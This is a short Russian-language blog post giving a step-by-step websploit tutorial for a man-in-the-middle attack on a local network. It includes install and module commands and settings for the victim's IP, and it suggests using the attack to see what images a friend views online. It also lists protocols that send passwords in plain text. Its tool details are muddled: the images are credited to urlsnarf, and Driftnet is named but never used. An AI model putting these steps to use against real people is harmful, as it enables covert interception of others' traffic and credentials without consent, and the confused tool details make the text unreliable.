URLSnarf — инструмент, используемый для захвата ссылок на сайты

Как мы можем запустить атаку MITM с помощью Websploit и Driftnet — Инструмент, используемый для захвата изображений.

Атака MITM — это тип кибер-атаки, когда атакующий перехватывает связь между двумя сторонами.

Человек по середине — примеры атаки

Шаг 1: нужно установить websploit в Kali Linux, если его нет.
# apt-get install websploit 

Шаг 2: Запуск websploit

 # websploit 
Шаг 3: Затем нам нужно перечислить модули с помощью websploit.
# wsf > show modules 

Шаг 4: Нужно выбрать network/mitm в разделе Network modules.

 wsf > use network/mitm
wsf:MITM > show options 

Interface: необходимо указать интерфейс сетевого адаптера на основе нашего сетевого адаптера.

set Interface eth0

или же

 set Interface wlan0 

Router: необходимо указать IP-адрес маршрутизатора, можно найти с помощью команды -n.

  set Router (Gateway IP) 

Цель: IP-адрес машины жертвы, можно найти с помощью ipconfig для windows и ifconfig для Linux.

Шаг 5: Теперь спуститесь на вывод компьютера жертвы и начните заниматься серфингом, все изображения будут захвачены urlsnarf.

Здесь вы можете найти фотографии, которые ваш друг смотрит в Интернете.

Протоколы, уязвимые для сниффинга

HTTP: отправка паролей в текстовом виде
TELNET: передача команд в текстовом виде
SNMP: отправка паролей в текстовом виде
POP: отправка паролей в текстовом виде
FTP: отправка паролей в текстовом виде
NNTP: отправка паролей в текстовом виде
IMAP: отправка паролей в чистом виде

 Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.

cryptoparty

Cryptography is typically bypassed, not penetrated.

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

5e7fa976b0640d40